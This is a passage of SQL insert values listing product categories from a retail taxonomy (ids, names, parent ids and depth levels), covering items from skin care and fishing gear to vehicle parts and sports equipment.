(8029,'Compressed Skin Care Mask Sheets',567,'Skin Care',4),
(8030,'Eggnog',413,'Beverages',2),
(8031,'Shoe Scrapers',628,'Shoe Care & Tools',3),
(8032,'Shoe Polishers',628,'Shoe Care & Tools',3),
(8033,'Shoe Care Kits',628,'Shoe Care & Tools',3),
(8034,'Weed Trimmer Spool Covers',7169,'Weed Trimmer Accessories',4),
(8036,'Fruit Flavored Drinks',413,'Beverages',2),
(8038,'Event Programs',96,'Party Supplies',3),
(8039,'Food Wrap Dispensers',6478,'Food Storage Accessories',3),
(8042,'Window Treatment Replacement Parts',6254,'Window Treatment Accessories',3),
(8043,'Fabric & Upholstery Cleaners',4973,'Household Cleaning Products',4),
(8044,'Divot Tools',1043,'Golf',3),
(8046,'Tablecloth Clips & Weights',672,'Tableware',3),
(8047,'Speaker Stand Bags',7163,'Speaker Accessories',4),
(8049,'Speaker Stands & Mounts',7163,'Speaker Accessories',4),
(8050,'Pet Eye Drops & Lubricants',2,'Pet Supplies',2),
(8051,'Steam Table Accessories',2901,'Kitchen Appliance Accessories',3),
(8052,'Steam Table Pan Covers',8051,'Steam Table Accessories',4),
(8053,'Steam Table Pans',8051,'Steam Table Accessories',4),
(8058,'Household Drawer Organizer Inserts',636,'Storage & Organization',3),
(8059,'Disposable Lids',135,'Food Service',2),
(8061,'Bicycle Protective Pads',3982,'Cycling Apparel & Accessories',4),
(8062,'Speed & Resistance Parachutes',990,'Exercise & Fitness',2),
(8064,'Bite Alarms',3334,'Fishing',3),
(8065,'Billiard Table Covers',3183,'Billiard Table Parts & Accessories',4),
(8066,'Vibration Exercise Machines',990,'Exercise & Fitness',2),
(8067,'Key Caps',1974,'Locks & Keys',2),
(8068,'Pet First Aid & Emergency Kits',2,'Pet Supplies',2),
(8069,'Cat Litter Box Liners',4,'Cat Supplies',3),
(8070,'Pet Waste Bags',2,'Pet Supplies',2),
(8071,'Shop Towels & General',623,'Household Cleaning Supplies',3),
(8072,'Musical Instrument Amplifier Accessories',55,'Musical Instrument & Orchestra Accessories',3),
(8073,'Musical Instrument Amplifier Footswitches',8072,'Musical Instrument Amplifier Accessories',4),
(8074,'Ski & Snowboard Wax',499845,'Skiing & Snowboarding',4),
(8075,'Nursing Pillow Covers',561,'Nursing & Feeding',2),
(8076,'Meal',2660,'Cooking & Baking Ingredients',3),
(8077,'Practice Nets & Screens',499799,'General Purpose Athletic Equipment',3),
(8078,'Desk Pads & Blotters',922,'Office Supplies',1),
(8079,'Windbreaks',1013,'Camping & Hiking',3),
(8080,'Cover Scents & Scent Attractants',8011,'Wildlife Attractants',5),
(8081,'Wildlife Bait, Feed & Minerals',8011,'Wildlife Attractants',5),
(8082,'Specimen Cups',491,'Health Care',2),
(8083,'Free Weight Storage Racks',6452,'Free Weight Accessories',4),
(8085,'Basketball Arcade Games',3356,'Arcade Equipment',2),
(8086,'Vehicle Ski & Snowboard Rack Accessories',6454,'Motor Vehicle Carrying Rack Accessories',4),
(8087,'Range Hood Accessories',2901,'Kitchen Appliance Accessories',3),
(8090,'Wall Mount Fans',608,'Fans',4),
(8092,'Fishing Reel Accessories',3334,'Fishing',3),
(8093,'Fishing Rod Accessories',3334,'Fishing',3),
(8094,'Fishing Reel Lubricants',8092,'Fishing Reel Accessories',4),
(8105,'Stump Shrinkers',491,'Health Care',2),
(8106,'Wine Fridge Accessories',2901,'Kitchen Appliance Accessories',3),
(8107,'Saddle Accessories',7215,'Horse Tack Accessories',4),
(8108,'Saddle Pads & Blankets',8107,'Saddle Accessories',5),
(8109,'Stirrups',5593,'Horse Tack',4),
(8110,'Inflatable Party Decorations',96,'Party Supplies',3),
(8111,'Mobile Phone Camera Accessories',264,'Mobile Phone Accessories',4),
(8112,'Ground Spikes',2878,'Hardware Accessories',2),
(8113,'Post Base Plates',2878,'Hardware Accessories',2),
(8114,'Safety Grab Bars',574,'Bathroom Accessories',2),
(8115,'Faucet Aerators',1489,'Faucet Accessories',4),
(8116,'Faucet Handles & Controls',1489,'Faucet Accessories',4),
(8117,'Cutter Accessories',3650,'Tool Accessories',2),
(8118,'Nibbler Dies',8117,'Cutter Accessories',3),
(8119,'Laboratory Specimens',1624,'Science & Laboratory',2),
(8120,'Prophy Heads',7499,'Dental Tools',3),
(8121,'Prophy Cups',7499,'Dental Tools',3),
(8122,'Menstrual Cups',485,'Feminine Sanitary Supplies',3),
(8123,'Dog Treadmills',5,'Dog Supplies',3),
(8127,'Sports Toy Accessories',1253,'Toys',2),
(8128,'Hula Hoop Accessories',8129,'Fitness Toy Accessories',4),
(8129,'Fitness Toy Accessories',8127,'Sports Toy Accessories',3),
(8130,'Prophy Paste',7497,'Dentistry',2),
(8132,'Skin Cleansing Brush Heads',2958,'Skin Care Tools',5),
(8134,'Marine Audio & Video Receivers',340,'Marine Electronics',2),
(8135,'Massage Stones',5663,'Massage & Relaxation',3),
(8136,'Hair Removal Wax Warmers',4507,'Hair Removal',4),
(8137,'Motor Vehicle Engines',899,'Motor Vehicle Parts',3),
(8142,'Vehicle Shift Knobs',2495,'Vehicle Decor',4),
(8144,'Motor Vehicle Brake Caliper Paint',3812,'Vehicle Paint',4),
(8145,'Vehicle Hitch Covers',2495,'Vehicle Decor',4),
(8147,'Motor Vehicle Loading Ramps',8237,'Vehicle Storage & Cargo',3),
(8149,'Baptism & Communion Dresses',5483,'Religious Ceremonial Clothing',4),
(8155,'Digital Signs',976,'Signage',2),
(8156,'Audio & Video Splitters & Switches',2082,'Electronics Accessories',2),
(8158,'Computer Backplates & I/O Shields',285,'Computer Components',3),
(8159,'Bullhorns',223,'Audio',2),
(8160,'Laptop Screen Digitizers',4224,'Laptop Parts',4),
(8161,'Prefabricated Kitchens & Kitchenettes',638,'Kitchen & Dining',2),
(8163,'E',285,'Computer Components',3),
(8164,'HDMI Splitters & Switches',8156,'Audio & Video Splitters & Switches',3),
(8167,'Pet Hair Dryers',6383,'Pet Grooming Supplies',3),
(8168,'Craft Foil',24,'Art & Craft Paper',5),
(8172,'Boat Storage Racks',7178,'Watercraft Storage Racks',4),
(8173,'Water Sport Board Storage Racks',7178,'Watercraft Storage Racks',4),
(8174,'Camera Accessory Sets',143,'Camera Parts & Accessories',3),
(8200,'Costume Gloves',5192,'Costume Accessories',3),
(8202,'Vehicle Wraps',2495,'Vehicle Decor',4),
(8203,'Ski & Snowboard Goggle Accessories',499845,'Skiing & Snowboarding',4),
(8204,'Eyewear Straps & Chains',2521,'Eyewear Accessories',4),
(8206,'Hanging Chair Replacement Parts',7248,'Chair Accessories',2),
(8208,'Fishing Reel Replacement Spools',8092,'Fishing Reel Accessories',4),
(8209,'Orchestral String Instrument Bow Cases',503033,'Orchestral String Instrument Accessories',5),
(8210,'Boxing Autographed Paraphernalia',4333,'Autographed Sports Paraphernalia',5),
(8213,'Gift Tags & Labels',94,'Gift Wrapping',4),
(8214,'Body & Facial Hair Bleach',528,'Shaving & Grooming',3),
(8215,'Push Up & Pull Up Bars',990,'Exercise & Fitness',2),
(8216,'Decorative Pom',96,'Party Supplies',3),
(8217,'Lip Primer',2645,'Lip Makeup',5),
(8218,'Face Primer',2571,'Face Makeup',5),
(8219,'Mascara Primer',2779,'Eye Makeup',5),
(8220,'Eye Primer',2779,'Eye Makeup',5),
(8222,'Altitude Training Masks',499799,'General Purpose Athletic Equipment',3),
(8227,'Motor Vehicle Frame & Body Parts',899,'Motor Vehicle Parts',3),
(8228,'Motor Vehicle Towing',899,'Motor Vehicle Parts',3),
(8231,'Motor Vehicle Power & Electrical Systems',899,'Motor Vehicle Parts',3),
(8232,'Motor Vehicle Carpet & Upholstery',899,'Motor Vehicle Parts',3),
(8233,'Motor Vehicle Interior Fittings',899,'Motor Vehicle Parts',3),
(8234,'Motor Vehicle Sensors & Gauges',899,'Motor Vehicle Parts',3),
(8235,'Motor Vehicle Controls',899,'Motor Vehicle Parts',3),
(8236,'Vehicle Repair & Specialty Tools',913,'Vehicle Maintenance, Care & Decor',3),
(8237,'Vehicle Storage & Cargo',5613,'Vehicle Parts & Accessories',2),
(8238,'Motor Vehicle Seating',899,'Motor Vehicle Parts',3),
(8239,'Bicycle Kickstands',3618,'Bicycle Parts',4),
(8243,'Battery Holders',7166,'Battery Accessories',4),
(8248,'Saris & Lehengas',5388,'Traditional & Ceremonial Clothing',3),
(8258,'Tool Safety Tethers',3650,'Tool Accessories',2),
(8259,'Motor Vehicle Clutch Alignment & Removal Tools',8236,'Vehicle Repair & Specialty Tools',4),
(8260,'Motor Vehicle Brake Service Kits',8236,'Vehicle Repair & Specialty Tools',4),
(8261,'Vehicle Tire Repair & Tire Changing Tools',8236,'Vehicle Repair & Specialty Tools',4),
(8269,'Gas Mask & Respirator Accessories',2047,'Work Safety Protective Gear',2),
(8270,'Roofing Shingles & Tiles',123,'Roofing',3),
(8271,'Reel',242,'Audio Players & Recorders',3),
(8272,'Fishing Rod Bags & Cases',8093,'Fishing Rod Accessories',4),
(8273,'Fishing Reel Bags & Cases',8092,'Fishing Reel Accessories',4),
(8274,'Wire Partitions, Enclosures & Doors',5830,'Industrial Storage',2),
(8275,'Drill Stands & Guides',3944,'Drill & Screwdriver Accessories',3),
(8276,'Drill Chucks',3944,'Drill & Screwdriver Accessories',3),
(8277,'Electric & Power Showers',2206,'Shower Parts',4),
(8278,'Traffic Cones & Barrels',114,'Construction',2),
(8295,'Pretend Shopping & Grocery',3229,'Pretend Play',3),
(8298,'Vehicle License Plate Mounts & Holders',2495,'Vehicle Decor',4),
(8301,'Vehicle Safety & Security',5613,'Vehicle Parts & Accessories',2),
(8302,'Vehicle Door Locks & Parts',2768,'Vehicle Alarms & Locks',4),
(8303,'Vehicle Door Locks & Locking Systems',8302,'Vehicle Door Locks & Parts',5),
(8304,'Vehicle Door Lock Knobs',8302,'Vehicle Door Locks & Parts',5),
(8305,'Vehicle Door Lock Actuators',8302,'Vehicle Door Locks & Parts',5),
(8306,'Golf Cart Enclosures',3436,'Vehicle Covers',4),
(8308,'Tonneau Covers',3436,'Vehicle Covers',4),
(8309,'Vehicle Storage Covers',3436,'Vehicle Covers',4),
(8310,'Automotive Storage Covers',8309,'Vehicle Storage Covers',5),
(8311,'Recreational Vehicle Storage Covers',8309,'Vehicle Storage Covers',5),
(8312,'Watercraft Storage Covers',8309,'Vehicle Storage Covers',5),
(8313,'Motorcycle Storage Covers',8309,'Vehicle Storage Covers',5),
(8314,'Golf Cart Storage Covers',8309,'Vehicle Storage Covers',5),
(8316,'Motor Vehicle Windshield Covers',3436,'Vehicle Covers',4),
(8319,'Sports & Agility Cones',499799,'General Purpose Athletic Equipment',3),
(8320,'Bathtub & Shower Jets',2206,'Shower Parts',4),
(8378,'Truck Bed Storage Boxes & Organizers',8237,'Vehicle Storage & Cargo',3),
(8436,'Toddler Nutrition Drinks & Shakes',562,'Baby & Toddler Food',3),
(8445,'Emergency Road Flares',2879,'Vehicle Safety Equipment',4),
(8446,'Motor Vehicle Roll Cages & Bars',2879,'Vehicle Safety Equipment',4),
(8447,'Car Window Nets',2879,'Vehicle Safety Equipment',4),
(8448,'Motor Vehicle Airbag Parts',2879,'Vehicle Safety Equipment',4),
(8449,'Vehicle Seat Belts',2879,'Vehicle Safety Equipment',4),
(8450,'Motor Vehicle Body Paint',3812,'Vehicle Paint',4),
(8451,'Hair Bun & Volume Shapers',171,'Hair Accessories',3),
(8452,'Hair Care Kits',486,'Hair Care',3),
(8461,'Musical Instrument Amplifier Covers & Cases',8072,'Musical Instrument Amplifier Accessories',4),
(8462,'Musical Instrument Amplifier Knobs',8072,'Musical Instrument Amplifier Accessories',4),
(8463,'Vehicle Shift Boots',2495,'Vehicle Decor',4),
(8464,'Vehicle Steering Wheel Covers',2495,'Vehicle Decor',4),
(8469,'Vehicle Decor Accessory Sets',2495,'Vehicle Decor',4),
(8470,'Drawer Slides',2878,'Hardware Accessories',2),
(8471,'Exercise Wedges',990,'Exercise & Fitness',2),
(8472,'Slot Machines',3793,'Games',2),
(8473,'Marine Speakers',340,'Marine Electronics',2),
(8474,'Vehicle Pet Barriers',2,'Pet Supplies',2),
(8475,'Vehicle Headrest Hangers & Hooks',8237,'Vehicle Storage & Cargo',3),
(8476,'Vehicle Seat Belt Straps',2879,'Vehicle Safety Equipment',4),
(8477,'Vehicle Seat Belt Buckles',2879,'Vehicle Safety Equipment',4),
(8478,'Vehicle Rear View Mirror Ornaments',2495,'Vehicle Decor',4),
(8480,'Musical Instrument Amplifier Tubes',8072,'Musical Instrument Amplifier Accessories',4),
(8483,'Motor Vehicle Video Monitor Mounts',8526,'Motor Vehicle Electronics',3),
(8485,'Multifunction Outdoor Power Equipment Attachments',4564,'Outdoor Power Equipment Accessories',3),
(8487,'Ground & Leaf Blower Attachments',8485,'Multifunction Outdoor Power Equipment Attachments',4),
(8488,'Tiller & Cultivator Attachments',8485,'Multifunction Outdoor Power Equipment Attachments',4),
(8489,'Pole Saw Attachments',8485,'Multifunction Outdoor Power Equipment Attachments',4),
(8490,'Dappen Dishes',7499,'Dental Tools',3),
(8493,'Wine Bottle Holders',649,'Barware',3),
(8499,'Lap Desks',922,'Office Supplies',1),
(8505,'Scoreboards',6739,'Coaching & Officiating',3),
(8506,'Vehicle Wheel Chocks',2879,'Vehicle Safety Equipment',4),
(8507,'Motorcycle Hand Guards',5547,'Motorcycle Protective Gear',4),
(8513,'Pet Bowl Stands',2,'Pet Supplies',2),
(8515,'Yams',5793,'Fresh & Frozen Vegetables',4),
(8516,'Television Circuit Boards',7264,'Printed Circuit Boards',3),
(8522,'Garage Floor Mats',630,'Household Supplies',2),
(8526,'Motor Vehicle Electronics',5613,'Vehicle Parts & Accessories',2),
(8528,'Bicycle Wheel Axles & Skewers',4597,'Bicycle Wheel Parts',5),
(8529,'Fishing Toys',1266,'Sports Toys',3),
(8530,'Massage Stone Warmers',5663,'Massage & Relaxation',3),
(8531,'Shaving Bowls & Mugs',528,'Shaving & Grooming',3),
(8532,'Check Presenters',135,'Food Service',2),
(8533,'Sneeze Guards',135,'Food Service',2),
(8534,'Portable Fuel Cans',913,'Vehicle Maintenance, Care & Decor',3),
(8535,'Underwater Camera Housing Accessories',143,'Camera Parts & Accessories',3),
(8537,'Baby Transport Liners & Sacks',4386,'Baby Transport Accessories',2),
(8539,'Thin & Zero Clients',278,'Computers',2),
(8541,'Electrical Muscle Stimulators',5870,'Occupational & Physical Therapy Equipment',3),
(8543,'Denture Repair Kits',526,'Oral Care',3),
(8544,'Printer, Copier, & Fax Machine Circuit Boards',7264,'Printed Circuit Boards',3),
(8545,'Household Appliance Circuit Boards',7264,'Printed Circuit Boards',3),
(8546,'Hard Drive Circuit Boards',499898,'Computer Circuit Boards',4),
(8549,'Pool & Spa Circuit Boards',7264,'Printed Circuit Boards',3),
(43616,'TV Replacement Speakers',403,'Television Parts & Accessories',4),
(43617,'Laptop Replacement Speakers',4224,'Laptop Parts',4),
(45262,'Tablet Computer Replacement Speakers',7349,'Tablet Computer Parts',4),
(99338,'Door Keyhole Escutcheons',6343,'Door Hardware',3),
(230911,'Bird & Wildlife House Accessories',696,'Decor',2),
(230912,'Watering Globes & Spikes',3568,'Watering & Irrigation',3),
(230913,'Medical Instruments',2496,'Medical',2),
(232166,'Scalpel Blades',230913,'Medical Instruments',3),
(232167,'Cabinet & Furniture Keyhole Escutcheons',4696,'Cabinet Hardware',3),
(232168,'Craft Knife Blades',504643,'Art & Crafting Tool Accessories',4),
(233419,'Nail Polish Drying Drops & Sprays',478,'Nail Care',4),
(233420,'Eye Pillows',5663,'Massage & Relaxation',3),
(234670,'Baseball & Softball Pitching Mounds',1070,'Baseball & Softball',3),
(234671,'Baseball & Softball Pitching Mats',1070,'Baseball & Softball',3),
(235920,'Floor & Carpet Dryers',604,'Household Appliances',2),
(235921,'Vehicle Hitch Locks',2768,'Vehicle Alarms & Locks',4),
(237166,'Aerobic Steps',990,'Exercise & Fitness',2),
(296246,'Camera Body Replacement Panels & Doors',143,'Camera Parts & Accessories',3),
(296247,'Camera Replacement Buttons & Knobs',143,'Camera Parts & Accessories',3),
(296248,'Camera Image Sensors',143,'Camera Parts & Accessories',3),
(296249,'Camera Replacement Screens & Displays',143,'Camera Parts & Accessories',3),
(298419,'Camera Circuit Boards',7264,'Printed Circuit Boards',3),
(298420,'Camera Digital Backs',143,'Camera Parts & Accessories',3),
(326120,'Vehicle Seat Belt Covers',2879,'Vehicle Safety Equipment',4),
(326122,'Saddle Bags & Panniers',8107,'Saddle Accessories',5),
(328060,'Prayer Cards',97,'Religious Items',2),
(328061,'Advice Cards',96,'Party Supplies',3),
(328062,'Paint Brush Cleaning Solutions',7019,'Paint Tool Accessories',3),
(352853,'Eyewear Lens Cleaning Solutions',2521,'Eyewear Accessories',4),
(355576,'Inversion Tables & Systems',990,'Exercise & Fitness',2),
(362738,'Off',8301,'Vehicle Safety & Security',3),
(461567,'Camera Gears',143,'Camera Parts & Accessories',3),
(461568,'Camera Lens Zoom Units',143,'Camera Parts & Accessories',3),
(463625,'Camera & Optic Replacement Cables',2096,'Camera & Optic Accessories',2),
(465846,'Ironing Centers',6356,'Cabinets & Storage',2),
(499673,'Smoke & Carbon Monoxide Detectors',1679,'Flood, Fire & Gas Safety',2),
(499674,'Floor Protection Films & Runners',630,'Household Supplies',2),
(499675,'Scanner Circuit Boards',7264,'Printed Circuit Boards',3),
(499676,'Alcoholic Beverages',413,'Beverages',2),
(499680,'Inner Tents',5655,'Tent Accessories',4),
(499681,'Ski & Snowboard Leashes',499845,'Skiing & Snowboarding',4),
(499682,'3D Printer Accessories',345,'Print, Copy, Scan & Fax',2),
(499684,'Bicycle Cable Housings',3618,'Bicycle Parts',4),
(499685,'Bicycle Cables',3618,'Bicycle Parts',4),
(499686,'Wire & Cable Identification Markers',3328,'Cable Management',3),
(499687,'Water Sport Helmets',499813,'Boating & Water Sport Apparel',4),
(499688,'Guitar Straps',3502,'Guitar Accessories',5),
(499691,'Luggage Racks & Stands',110,'Luggage Accessories',2),
(499692,'Oxygen Tanks',4551,'Respiratory Care',3),
(499693,'Growth Charts',696,'Decor',2),
(499694,'Bicycle Tire Repair Supplies & Kits',3214,'Bicycle Accessories',4),
(499696,'Medical Needles & Syringes',2907,'Medical Supplies',3),
(499697,'In',1810,'Plumbing Fittings & Supports',3),
(499698,'Nail Drill Accessories',2975,'Nail Tools',5),
(499699,'Treadmill Accessories',4598,'Cardio Machine Accessories',4),
(499700,'Stair Climber & Stepper Accessories',4598,'Cardio Machine Accessories',4),
(499701,'Rowing Machine Accessories',4598,'Cardio Machine Accessories',4),
(499702,'Exercise Bike Accessories',4598,'Cardio Machine Accessories',4),
(499703,'Elliptical Trainer Accessories',4598,'Cardio Machine Accessories',4),
(499707,'Tapioca Pearls',2660,'Cooking & Baking Ingredients',3),
(499708,'Work Safety Harnesses',2047,'Work Safety Protective Gear',2),
(499709,'Horse Leads',5593,'Horse Tack',4),
(499710,'Horse Halters',5593,'Horse Tack',4),
(499711,'Tarot Cards',97,'Religious Items',2),
(499712,'Toy Gift Baskets',1253,'Toys',2),
(499713,'Athletics',988,'Sporting Goods',1),
(499715,'Baseball & Softball Chest Protectors',1078,'Baseball & Softball Protective Gear',4),
(499716,'Catchers Equipment Sets',1078,'Baseball & Softball Protective Gear',4),
(499717,'Catchers Helmets & Masks',1078,'Baseball & Softball Protective Gear',4),
(499718,'Baseball & Softball Leg Guards',1078,'Baseball & Softball Protective Gear',4),
(499719,'Boxing & Martial Arts',499713,'Athletics',2),
(499720,'Boxing & Martial Arts Training Equipment',499719,'Boxing & Martial Arts',3),
(499721,'Strike Shields',499720,'Boxing & Martial Arts Training Equipment',4),
(499722,'Boxing & Martial Arts Headgear',4008,'Boxing & Martial Arts Protective Gear',4),
(499723,'Boxing & Martial Arts Body Protectors',4008,'Boxing & Martial Arts Protective Gear',4),
(499724,'MMA Shin Guards',4008,'Boxing & Martial Arts Protective Gear',4),
(499725,'Boxing & Martial Arts Arm Guards',4008,'Boxing & Martial Arts Protective Gear',4),
(499726,'Boxing & MMA Hand Wraps',4008,'Boxing & Martial Arts Protective Gear',4),
(499727,'Referee Wallets',6739,'Coaching & Officiating',3),
(499729,'Captains Armbands',6739,'Coaching & Officiating',3),
(499730,'Umpire Indicators',6739,'Coaching & Officiating',3),
(499731,'Pitch Counters',6739,'Coaching & Officiating',3),
(499732,'Flip Coins & Discs',6739,'Coaching & Officiating',3),
(499733,'Referee Stands & Chairs',6739,'Coaching & Officiating',3),
(499734,'Cricket Stumps',1087,'Cricket',3),
(499735,'Cricket Equipment Sets',1087,'Cricket',3),
(499736,'Cricket Protective Gear',1087,'Cricket',3),
(499737,'Cricket Bat Accessories',1087,'Cricket',3),
(499738,'Cricket Bat Grips',499737,'Cricket Bat Accessories',4),
(499739,'Cricket Leg Guards',499736,'Cricket Protective Gear',4),
(499740,'Fencing Jackets & LamÃ©s',3261,'Fencing Protective Gear',4),
(499741,'Field Hockey & Lacrosse',499713,'Athletics',2),
(499742,'Lacrosse Equipment Sets',499741,'Field Hockey & Lacrosse',3),
(499743,'Pet Heating Pads',2,'Pet Supplies',2),
(499744,'Field Hockey & Lacrosse Protective Gear',499741,'Field Hockey & Lacrosse',3),
(499745,'Field Hockey & Lacrosse Gloves',499744,'Field Hockey & Lacrosse Protective Gear',4),
(499746,'Field Hockey & Lacrosse Helmets',499744,'Field Hockey & Lacrosse Protective Gear',4),
(499747,'Field Hockey & Lacrosse Masks & Goggles',499744,'Field Hockey & Lacrosse Protective Gear',4),
(499751,'Basketball Training Aids',1081,'Basketball',3),
(499755,'Hockey Shin Guards & Leg Pads',1105,'Hockey Protective Gear',4),
(499756,'Hockey Elbow Pads',1105,'Hockey Protective Gear',4),
(499757,'Hockey Shoulder Pads & Chest Protectors',1105,'Hockey Protective Gear',4),
(499759,'Inline Skate Parts',499761,'Inline & Roller Skating',3),
(499760,'Roller Skate Parts',499761,'Inline & Roller Skating',3),
(499761,'Inline & Roller Skating',1011,'Outdoor Recreation',2),
(499766,'Vehicle Fuel Injection Cleaning Kits',2895,'Vehicle Cleaning',4),
(499767,'Scrub Brush Heads & Refills',623,'Household Cleaning Supplies',3),
(499768,'Conduit & Housings',127,'Power & Electrical Supplies',2),
(499769,'Boxing & MMA Punch Mitts',499720,'Boxing & Martial Arts Training Equipment',4),
(499770,'Electrical Conduit',499768,'Conduit & Housings',3),
(499771,'Inline & Roller Skating Protective Gear',499761,'Inline & Roller Skating',3),
(499772,'Window Hardware',115,'Building Materials',2),
(499773,'Window Cranks',499772,'Window Hardware',3),
(499774,'Vehicle Body Filler',8236,'Vehicle Repair & Specialty Tools',4),
(499775,'Roller Skating Pads',499771,'Inline & Roller Skating Protective Gear',4),
(499776,'Skate Helmets',3067,'Skateboarding Protective Gear',4),
(499778,'Football Rib Protection Shirts & Vests',1097,'Football Protective Gear',4),
(499779,'Football Dummies & Sleds',3998,'Football Training Equipment',4),
(499780,'Golf Club Shafts',3642,'Golf Club Parts & Accessories',4),
(499781,'Gymnastics Grips',3808,'Gymnastics Protective Gear',4),
(499782,'Rugby Protective Gear',1110,'Rugby',3),
(499783,'Racquetball & Squash Gloves',503752,'Racquetball & Squash',3),
(499784,'Soccer Protective Gear',1111,'Soccer',3),
(499785,'Handballs',1047,'Team Handball',3),
(499786,'Track Starting Blocks',1060,'Track & Field',3),
(499787,'Volleyball Training Aids',1115,'Volleyball',3),
(499788,'Volleyball Protective Gear',1115,'Volleyball',3),
(499789,'Volleyball Knee Pads',499788,'Volleyball Protective Gear',4),
(499790,'Wrestling Knee Pads',3057,'Wrestling Protective Gear',4),
(499791,'Wrestling Headgear',3057,'Wrestling Protective Gear',4),
(499792,'Cardio',990,'Exercise & Fitness',2),
(499793,'Weight Lifting',990,'Exercise & Fitness',2),
(499794,'Weight Bar Collars',6452,'Free Weight Accessories',4),
(499795,'Exercise Benches',990,'Exercise & Fitness',2),
(499796,'Balance Trainers',990,'Exercise & Fitness',2),
(499797,'Ab Wheels & Rollers',990,'Exercise & Fitness',2),
(499798,'Suspension Trainers',990,'Exercise & Fitness',2),
(499799,'General Purpose Athletic Equipment',499713,'Athletics',2),
(499800,'Athletic Cups',499799,'General Purpose Athletic Equipment',3),
(499801,'Sports Mouthguards',499799,'General Purpose Athletic Equipment',3),
(499802,'Speed & Agility Ladders & Hurdles',499799,'General Purpose Athletic Equipment',3),
(499803,'Gym Mats',499799,'General Purpose Athletic Equipment',3),
(499804,'Holiday Ornament Hooks',596,'Seasonal & Holiday Decorations',3),
(499805,'Easter Egg Decorating Kits',596,'Seasonal & Holiday Decorations',3),
(499810,'MP3 Player Batteries',276,'Batteries',4),
(499811,'Boating & Water Sports',1011,'Outdoor Recreation',2),
(499813,'Boating & Water Sport Apparel',499811,'Boating & Water Sports',3),
(499814,'Wetsuit Pieces',499813,'Boating & Water Sport Apparel',4),
(499815,'Climbing Apparel & Accessories',7059,'Climbing',3),
(499816,'Climbing Gloves',499815,'Climbing Apparel & Accessories',4),
(499817,'Horse Fly Masks',3257,'Horse Care',4),
(499818,'Horse Grooming Combs, Brushes & Mitts',5025,'Horse Grooming',5),
(499819,'Horse Wormers',3257,'Horse Care',4),
(499820,'Horse Tack Boxes',7215,'Horse Tack Accessories',4),
(499821,'Camera & Optics Manuals',5037,'Product Manuals',2),
(499822,'Refillable Makeup Palettes & Cases',2548,'Makeup Tools',5),
(499823,'Fishing Tackle',3334,'Fishing',3),
(499824,'Hunting & Shooting',1011,'Outdoor Recreation',2),
(499825,'Bows & Crossbows',1033,'Archery',4),
(499826,'Bow & Crossbow Accessories',1033,'Archery',4),
(499830,'Broadheads & Field Points',3291,'Arrow Parts & Accessories',5),
(499831,'Arrow Fletchings',3291,'Arrow Parts & Accessories',5),
(499832,'Arrow Nocks',3291,'Arrow Parts & Accessories',5),
(499833,'Archery Gloves & Releases',1033,'Archery',4),
(499834,'Paintball & Airsoft',499824,'Hunting & Shooting',3),
(499835,'Paintball & Airsoft Protective Gear',499834,'Paintball & Airsoft',4),
(499836,'Paintball & Airsoft Gloves',499835,'Paintball & Airsoft Protective Gear',5),
(499837,'Paintball & Airsoft Vests',499835,'Paintball & Airsoft Protective Gear',5),
(499838,'Paintball & Airsoft Goggles & Masks',499835,'Paintball & Airsoft Protective Gear',5),
(499839,'Paintball & Airsoft Pads',499835,'Paintball & Airsoft Protective Gear',5),
(499840,'Shooting & Range Accessories',499824,'Hunting & Shooting',3),
(499841,'Shooting Sticks & Bipods',499840,'Shooting & Range Accessories',4),
(499842,'Shooting Rests',499840,'Shooting & Range Accessories',4),
(499844,'Winter Sports & Activities',1011,'Outdoor Recreation',2),
(499845,'Skiing & Snowboarding',499844,'Winter Sports & Activities',3),
(499846,'Outdoor Games',1011,'Outdoor Recreation',2),
(499847,'Pickleballs',3390,'Pickleball',4),
(499848,'Pickleball Paddles',3390,'Pickleball',4),
(499849,'Platform Tennis Balls',499904,'Platform & Paddle Tennis',4),
(499850,'Platform & Paddle Tennis Paddles',499904,'Platform & Paddle Tennis',4),
(499853,'Gun Slings',2214,'Gun Care & Accessories',3),
(499854,'Gun Cleaning Solvents',503021,'Gun Cleaning',4),
(499855,'Gun Cleaning Cloths & Swabs',503021,'Gun Cleaning',4),
(499856,'Gun Cleaning Patches',503021,'Gun Cleaning',4),
(499857,'Ammunition Reloading Presses',503026,'Reloading Supplies & Equipment',4),
(499858,'Medical Stretchers & Gurneys',3477,'Medical Equipment',3),
(499859,'Grinder Accessories',3650,'Tool Accessories',2),
(499860,'Grinding Wheels & Points',499859,'Grinder Accessories',3),
(499861,'Wallyball Equipment',499713,'Athletics',2),
(499864,'Calculator Accessories',950,'Office Equipment',2),
(499865,'Security Safe Accessories',359,'Business & Home Security',2),
(499866,'Office Supply Manuals',5037,'Product Manuals',2),
(499867,'Diving & Snorkeling Equipment Sets',1135,'Diving & Snorkeling',4),
(499868,'Bicycle Groupsets',3618,'Bicycle Parts',4),
(499869,'Bicycle Tire Valve Caps',3618,'Bicycle Parts',4),
(499870,'Bicycle Tire Valves',3618,'Bicycle Parts',4),
(499871,'Bicycle Tire Valve Adapters',3618,'Bicycle Parts',4),
(499872,'Lawn Mower Tire Tubes',4566,'Lawn Mower Accessories',4),
(499873,'Heating, Ventilation & Air Conditioning',632,'Hardware',1),
(499874,'Air Ducts',499873,'Heating, Ventilation & Air Conditioning',2),
(499875,'Bicycle Rim Strips',4597,'Bicycle Wheel Parts',5),
(499876,'Grout',503743,'Masonry Consumables',3),
(499877,'Avalanche Safety Airbags',499951,'Avalanche Safety',4),
(499878,'Mobile Phone & Tablet Tripods & Monopods',2082,'Electronics Accessories',2),
(499879,'Ceramic & Pottery Glazes',505378,'Craft Paint, Ink & Glaze',5),
(499880,'Tractor Tires',5867,'Tractor Parts & Accessories',4),
(499881,'Tractor Wheels',5867,'Tractor Parts & Accessories',4),
(499882,'Tetherball Poles',3126,'Tetherball',4),
(499883,'Tetherball Sets',3126,'Tetherball',4),
(499884,'Tetherballs',3126,'Tetherball',4),
(499885,'Stair Treads',630,'Household Supplies',2),
(499886,'Mixing Tool Paddles',3650,'Tool Accessories',2),
(499887,'Handheld Power Mixers',1167,'Tools',2),
(499888,'Paint Shakers',2077,'Paint Tools',3),
(499889,'Exercise Machine Circuit Boards',7264,'Printed Circuit Boards',3),
(499890,'Hockey Goalie Equipment Sets',1105,'Hockey Protective Gear',4),
(499891,'Homebrewing & Winemaking Kits',3577,'Homebrewing & Winemaking Supplies',3),
(499892,'Broom Heads',623,'Household Cleaning Supplies',3),
(499893,'Carbon Brushes',127,'Power & Electrical Supplies',2),
(499894,'Plant Cages & Supports',2962,'Gardening',3),
(499897,'Retail Display Props & Models',138,'Retail',2),
